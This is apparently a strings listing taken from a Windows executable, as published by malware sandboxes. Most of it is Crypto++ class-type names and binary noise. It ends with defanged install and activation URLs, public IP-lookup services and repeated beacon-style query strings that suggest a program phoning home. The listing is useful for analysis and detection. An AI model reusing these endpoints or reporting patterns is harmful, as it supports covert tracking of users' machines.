.?AV?$DL_SignatureSchemeBase@VPK_Verifier@CryptoPP@@V?$DL_PublicKey@UEC2NPoint@CryptoPP@@@2@@CryptoPP@@
.?AVPublicKeyAlgorithm@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@V?$DSA2@VSHA1@CryptoPP@@@2@@2@@CryptoPP@@
.?AV?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@V?$DSA2@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@UECPPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VECP@CryptoPP@@@CryptoPP@@U?$ECDSA@VECP@CryptoPP@@VSHA256@2@@2@@2@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey_EC@VEC2N@CryptoPP@@@CryptoPP@@
.PAV?$DL_GroupParameters@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_SignatureSchemeBase@VPK_Verifier@CryptoPP@@V?$DL_PublicKey@VInteger@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_PublicKey_EC@VECP@CryptoPP@@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PublicKey@UEC2NPoint@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_VerifierBase@UECPPoint@CryptoPP@@@CryptoPP@@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@2@@CryptoPP@@
.?AV?$DL_SignatureSchemeBase@VPK_Signer@CryptoPP@@V?$DL_PrivateKey@VInteger@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@2@VOID@2@@CryptoPP@@
.?AV?$DL_SignatureSchemeBase@VPK_Signer@CryptoPP@@V?$DL_PrivateKey@UEC2NPoint@CryptoPP@@@2@@CryptoPP@@
.?AVPrivateKey@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PublicKey@VInteger@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AVPublicKey@CryptoPP@@
.PAVDL_GroupParameters_GFP@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@CryptoPP@@@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPublicKey@CryptoPP@@@CryptoPP@@
.?AV?$DL_Key@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@UECPPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PublicKey_EC@VECP@CryptoPP@@@2@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@VDL_GroupParameters_DSA@2@VOID@2@@CryptoPP@@
.PAV?$DL_PublicKey@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VECP@CryptoPP@@@CryptoPP@@U?$ECDSA@VECP@CryptoPP@@VSHA256@2@@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_Key@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@2@VOID@2@@CryptoPP@@
.?AV?$DL_PrivateKey_EC@VECP@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@VDL_GroupParameters_DSA@2@VOID@2@@CryptoPP@@
.PAV?$DL_PublicKey@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AVX509PublicKey@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@2@VOID@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@UECPPoint@CryptoPP@@@CryptoPP@@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@2@@CryptoPP@@
.PAV?$DL_PrivateKey@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@CryptoPP@@@CryptoPP@@
.PAV?$DL_PrivateKey@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@UEC2NPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PublicKey_EC@VEC2N@CryptoPP@@@2@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_Key@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@2@VOID@2@@CryptoPP@@
.?AV?$DL_PublicKey@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PrivateKey@UECPPoint@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@V?$DSA2@VSHA1@CryptoPP@@@2@@2@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@UEC2NPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VEC2N@CryptoPP@@@CryptoPP@@U?$ECDSA@VEC2N@CryptoPP@@VSHA256@2@@2@@2@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_EncryptorBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_EncryptorBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_CryptoSystemBase@VPK_Encryptor@CryptoPP@@V?$DL_PublicKey@VInteger@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_EncryptorImpl@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_DecryptorBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_DecryptorBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_CryptoSystemBase@VPK_Decryptor@CryptoPP@@V?$DL_PrivateKey@VInteger@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_DecryptorImpl@U?$DL_CryptoSchemeOptions@U?$DLIES@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@CryptoPP@@$00@CryptoPP@@UDL_CryptoKeys_GFP@2@V?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@2@V?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@2@V?$DL_EncryptionAlgorithm_Xor@V?$HMAC@VSHA1@CryptoPP@@@CryptoPP@@$00@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyDerivationAlgorithm_P1363@VInteger@CryptoPP@@$00V?$P1363_KDF2@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_NR@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_NR@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyDerivationAlgorithm@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@2@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@VInteger@CryptoPP@@@CryptoPP@@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@UDL_SignatureKeys_GFP@CryptoPP@@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@H@CryptoPP@@UDL_SignatureKeys_GFP@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$SimpleKeyingInterfaceImpl@VHMAC_Base@CryptoPP@@V?$HMAC@VSHA1@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@VDL_GroupParameters_GFP_DefaultSafePrime@2@VOID@2@@CryptoPP@@
.?AV?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@VDL_GroupParameters_GFP_DefaultSafePrime@2@VOID@2@@CryptoPP@@
.?AV?$DL_PublicKey_GFP@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VPKCS8PrivateKey@CryptoPP@@VDL_GroupParameters_GFP@2@VOID@2@@CryptoPP@@
.?AV?$DL_PrivateKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyImpl@VX509PublicKey@CryptoPP@@VDL_GroupParameters_GFP@2@VOID@2@@CryptoPP@@
.?AV?$DL_PublicKey_GFP@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0A@$0HPPPPPPP@$00$03$0A@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.PAVDL_GroupParameters_IntegerBased@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP_DefaultSafePrime@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@VDL_GroupParameters_GFP@CryptoPP@@@CryptoPP@@
.?AVKeyTooShort@PK_SignatureScheme@CryptoPP@@
.?AVInvalidKeyLength@PK_SignatureScheme@CryptoPP@@
.PBVPrimeSelector@CryptoPP@@
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
7%7u7y7
:(:2:>:[:
1%1s1
3?5s5
8'95999@9
4!4'4 41454;4
9!9%9 9/959
>%>)>/>{>
4%4)4/43494
9#9'9-91979
7!7/737@7
63;3#858
0#131#222
8%8U8\8c8
3"40444:4
.161#525>5^5
:";0;4;;;{;
7 747@7[7
8%8x:
3 3$3(3,3034383
<,<0<4<8<
)030:0?0*6
9.:4:8:<:@:
3"3&3*3.323,4
;';5;?;[;`;
2!2'2,282
7#8-8}869M9
1 1@1`1|1
6&7.:5:6>
3?4g4n4V5o5
2%2U2^2
1/2
8(8,8084888<8@8
1$1(1,1014181
8 8$8(8,80848
? ?$?(?,?0?
2 2$2(2,2
303C3S3[3
#0 010:0
0"0(0.040:0
6!6'6-63696
1$1*10161.2
45
0%1U1z1
3-3U3}3
;$;0;8;|;
2 2@2`2|2
0(040<0\0
7$7,787\7
0$0,080\0|0
8 8(808<8`8
9(909<9`9
< <$<(<,<0<4<8<<<
= =$=(=,=0=4=`=
hXXp://xiaobingdou.com/anzhuang.aspx
hXXp://xiaobingdou.com/jihuo.aspx
Advapi32.dll
HKEY_DYN_DATA
QhXXp://VVV.tobeahero.cn
mailto:[email protected]
%d/%d/%d/%d/%d/%d
Rmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
ADVAPI32.DLL
USER32.DLL
portuguese-brazilian
[%d:%d:%d:%d(%d)]
combase.dll
badvapi32.dll
c.exe
d\
hXXp://1212.ip138.com/ic.asp
hXXp://VVV.ip-adress.com/
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php
?h=X-X-X-X-X-X&r=8888_%s --- sdadsada
?h=X-X-X-X-X-X&r=9999_%s --- sdadsada
?h=X-X-X-X-X-X&r=1000_%s --- sdadsada
?h=X-X-X-X-X-X&r=1234_%s --- sdadsada
?h=X-X-X-X-X-X&r=7777_%s --- sdadsada
?h=X-X-X-X-X-X&r=2345_%s --- sdadsada
?h=X-X-X-X-X-X&r=9527_%s --- sdadsada
?h=X-X-X-X-X-X&r=3456_%s --- sdadsada
?h=X-X-X-X-X-X&r=4567_%s --- sdadsada
?h=X-X-X-X-X-X&r=7890_%s --- sdadsada
?h=X-X-X-X-X-X&r=7892_%s --- sdadsada
?h=X-X-X-X-X-X&r=7893_%s --- sdadsada
?h=X-X-X-X-X-X&r=7894_%s --- sdadsada
